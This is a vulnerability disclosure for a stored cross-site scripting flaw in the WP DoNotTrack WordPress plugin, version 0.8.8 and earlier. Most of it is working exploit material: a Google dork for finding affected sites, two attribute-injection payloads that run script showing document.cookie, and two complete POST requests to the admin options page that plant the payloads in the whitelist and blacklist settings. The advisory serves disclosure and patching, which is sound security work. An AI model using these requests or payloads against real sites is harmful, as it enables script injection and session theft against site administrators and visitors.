/*!
- # VULNERABILITY: WP DoNotTrack WordPress Plugin <= 0.8.8 - Authenticated Persistent XSS
- # GOOGLE DORK: inurl:/wp-content/plugins/wp-donottrack/
- # DATE: 2021-05-03
- # SECURITY RESEARCHER: m0ze [ https://m0ze.ru ]
- # VENDOR: Frank Goossens [ http://blog.futtta.be ]
- # SOFTWARE VERSION: <= 0.8.8
- # SOFTWARE LINK: https://wordpress.org/plugins/wp-donottrack/
- # CVSS: 3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:N
- # CWE: CWE-79
- # CVE: N/A
*/



### -- [ Info: ]

[i] An Authenticated Persistent XSS vulnerability was discovered in the WP DoNotTrack plugin through v0.8.8 for WordPress.

[i] Vulnerable parameter(s): &whitelist=, &blacklist=.



### -- [ Impact: ]

[~] Malicious JavaScript code injections, the ability to combine attack vectors against the targeted system, which can lead to a complete compromise of the resource.



### -- [ Payloads: ]

[$] " autofocus=autofocus onfocus=alert(document.cookie);>

[$] " autofocus=autofocus onfocus=alert(origin);>



### -- [ PoC #1 | Authenticated Persistent XSS | Whitelist: ]

[!] POST /wp-admin/options.php HTTP/2
Host: example.com
Cookie: [admin cookies]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 263

option_page=dnt-settings-group&action=update&_wpnonce=5988804004&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Ddnt_settings_page&ifdnt=0&agressive=1&listmode=0&whitelist=%22+autofocus%3Dautofocus+onfocus%3Dalert%28document.cookie%29%3B%3E&blacklist=



### -- [ PoC #2 | Authenticated Persistent XSS | Blacklist: ]

[!] POST /wp-admin/options.php HTTP/2
Host: example.com
Cookie: [admin cookies]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 254

option_page=dnt-settings-group&action=update&_wpnonce=5988804004&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Ddnt_settings_page&ifdnt=0&agressive=1&listmode=0&whitelist=&blacklist=%22+autofocus%3Dautofocus+onfocus%3Dalert%28origin%29%3B%3E



### -- [ Contacts: ]

[+] Website: m0ze.ru
[+] GitHub: @m0ze
[+] Telegram: @m0ze_ru
[+] Twitter: @vladm0ze